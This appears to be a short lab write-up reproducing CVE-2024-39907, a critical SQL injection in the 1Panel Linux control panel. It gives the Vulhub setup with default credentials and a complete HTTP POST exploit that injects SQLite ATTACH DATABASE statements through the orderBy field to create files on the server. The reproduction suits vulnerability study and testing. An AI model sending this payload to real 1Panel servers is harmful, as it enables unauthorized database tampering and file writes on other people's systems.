CVE-2024-39907

CVE Details:#

• Published July 18, 2024
• Severity CRITICAL
• CNA Score 9.8

Description:#

A critical SQL injection vulnerability (CVE-2024-39907) has been discovered in 1Panel, an open-source web-based Linux server management control panel. The vulnerability was disclosed on July 18, 2024, and carries a CVSS score of 9.8 (Critical). The flaw affects 1Panel versions from v1.10.9-lts up to (excluding) v1.10.12-lts

Vulhub Source:#

1panel/CVE-2024-39907/README.md

After the server starts, access http://127.0.0.1:10086/entrance using the following default credentials:

• Username: 1panel
• Password: 1panel_password

Vulnerability Reproduction:#

After logging into the 1Panel control panel with the default credentials, the vulnerability exists in the /api/v1/hosts/command/search endpoint where the orderBy parameter lacks proper input validation, allowing SQL injection attacks.

Send the following malicious POST request to exploit the vulnerability:

POST /api/v1/hosts/command/search HTTP/1.1
Host: your-ip:10086
Accept-Language: zh
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
Cookie: psession=your-session-cookie
Connection: close
Content-Type: application/json
Content-Length: 83

{
  "page":1,
  "pageSize":10,
  "groupID":0,
  "orderBy":"3;ATTACH DATABASE '/tmp/randstr.txt' AS test;create TABLE test.exp (data text);create TABLE test.exp (data text);drop table test.exp;",
  "order":"ascending",
  "name":"a"
}

The malicious payload in the orderBy parameter exploits SQLite’s ATTACH DATABASE functionality to create arbitrary files on the server filesystem, demonstrating successful SQL injection. When processed, the 1Panel backend executes the injected SQL commands without validation, confirming the vulnerability exists and can be exploited.

My approach:#

Starting ZAP proxy to intercept the request and replaying it using the maliciuos payload.